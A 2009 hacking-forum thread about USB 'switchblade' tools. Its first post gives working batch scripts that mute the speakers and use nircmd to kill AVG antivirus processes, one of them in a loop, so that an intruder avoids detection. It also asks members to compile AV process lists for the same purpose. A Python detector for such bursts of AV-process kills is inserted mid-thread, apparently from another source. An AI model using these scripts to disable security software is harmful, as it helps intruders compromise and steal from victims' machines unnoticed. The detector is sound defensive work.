Alternative Method to Kill AV's. |
Fri, 06 Nov 2009 19:34:17 +0000
Post #41
Newbie | Group: Members | Posts: 2 | Joined: Fri, 06 Nov 2009 19:14:35 +0000 | Member No.: 16,305

Ok guys, we all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AVs before launching our switchblades. If this works out, I think it would be a great addition to Leapos Pocket Knife.

What I decided to try was using Nircmd's processkill command to eliminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AVs such as Avast, we would want to make sure we mute the system speakers. (Note, we would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED".) Anyway, if a certain AV alerts to the attempt to kill its process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out without immediate detection. I tested this on AVG and it worked flawlessly and silently.

CODE
    ::Abigwar's First Attempt at Batch AVkiller
    ::Mute the system volume, in case of audible AV Alerts (Avast!)
    nircmd mutesysvolume 1
    ::Kill AVG Command Center
    nircmd killprocess avgcc.exe
    ::Kill other AVG Processes
    nircmd killprocess avgemc.exe
    nircmd killprocess avgupsvc.exe
    nircmd killprocess avgamsvr.exe
    ::Restore system volume at end of switchblade
    nircmd mutesysvolume 0

Now what I would like to ask from all of you is to look at your system processes and let's make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicable processes. We also need to see how each AV reacts to the attempt to kill its processes.

One other thing I was considering: if an AV's process is persistent, we could loop the batch file to continue to run, and kill the process over and over. How that could work is we would call the separate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switchblade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end.

CODE
    ::Theoretical Loop batch
    :Start
    nircmd killprocess avgcc.exe
    nircmd killprocess avgemc.exe
    nircmd killprocess avgupsvc.exe
    nircmd killprocess avgamsvr.exe
    IF EXIST SWITCHDONE.TXT GOTO END
    GOTO START
    :END
    del switchdone.txt

A pretty detailed list of AV processes can be found here: http://dev.metasploit.com/redmine/projects...reter/killav.rb
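The pattern this post describes, several AV processes exiting within seconds right after a process-kill utility starts, is exactly what a defender would alert on. The following Python detector is an added example, not code from the thread; the log line format, host names and the 10-second window are assumptions, and the process names come from the post's AVG example.

```python
from collections import deque
from datetime import datetime, timedelta

# Process names from the post's AVG example (constructed list, not exhaustive; extend per vendor).
AV_PROCESSES = {"avgcc.exe", "avgemc.exe", "avgupsvc.exe", "avgamsvr.exe"}
# Command-line utilities able to terminate processes (nircmd is the one the post uses).
KILL_TOOLS = {"nircmd.exe"}
WINDOW = timedelta(seconds=10)  # assumed burst window
THRESHOLD = 2                   # distinct AV processes exiting inside WINDOW

# Constructed sample log modelled loosely on Windows Security events 4688 (process
# creation) and 4689 (process exit), one record per line: "<iso-time> <event-id> <host> <image>".
SAMPLE_LOG = """\
2009-11-06T19:34:17 4688 host1 nircmd.exe
2009-11-06T19:34:17 4689 host1 avgcc.exe
2009-11-06T19:34:18 4689 host1 avgemc.exe
2009-11-06T19:34:18 4689 host1 avgupsvc.exe
2009-11-06T19:34:18 4689 host1 avgamsvr.exe
2009-11-06T19:40:02 4689 host2 avgcc.exe
2009-11-06T19:41:55 4689 host2 notepad.exe
"""

def parse(line):
    ts, event_id, host, image = line.split()
    return datetime.fromisoformat(ts), event_id, host, image.lower()

def detect_av_kill(log_text):
    """Return {host: alert} for every host whose AV processes exit in a burst.
    The alert lists the killed images and whether a kill tool started shortly before."""
    recent_exits = {}  # host -> deque of (ts, image) for AV process exits in the window
    tool_starts = {}   # host -> timestamps at which a known kill tool was created
    alerts = {}
    for line in log_text.strip().splitlines():
        ts, event_id, host, image = parse(line)
        if event_id == "4688" and image in KILL_TOOLS:
            tool_starts.setdefault(host, []).append(ts)
        elif event_id == "4689" and image in AV_PROCESSES:
            q = recent_exits.setdefault(host, deque())
            q.append((ts, image))
            while q and ts - q[0][0] > WINDOW:  # drop exits that fell out of the window
                q.popleft()
            killed = {img for _, img in q}
            if len(killed) >= THRESHOLD:        # overwrite so the alert grows with the burst
                tool_seen = any(timedelta(0) <= ts - t <= WINDOW for t in tool_starts.get(host, []))
                alerts[host] = {"killed": sorted(killed), "first_exit": q[0][0],
                                "kill_tool_seen": tool_seen}
    return alerts

if __name__ == "__main__":
    for host, alert in detect_av_kill(SAMPLE_LOG).items():
        print(host, alert)
```

A single AV process exiting (host2 above) stays below the threshold, so routine restarts and updates do not fire the rule.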
Fri, 06 Nov 2009 21:39:37 +0000
Post #42
Hak.5 Fan ++ | Group: Members | Posts: 76 | Joined: Tue, 30 Dec 2008 18:35:07 +0000 | From: Australia | Member No.: 12,383
I find that the easiest way to kill anti-virus software etc is to go to the programs main controls and shut it down from there.
Too easy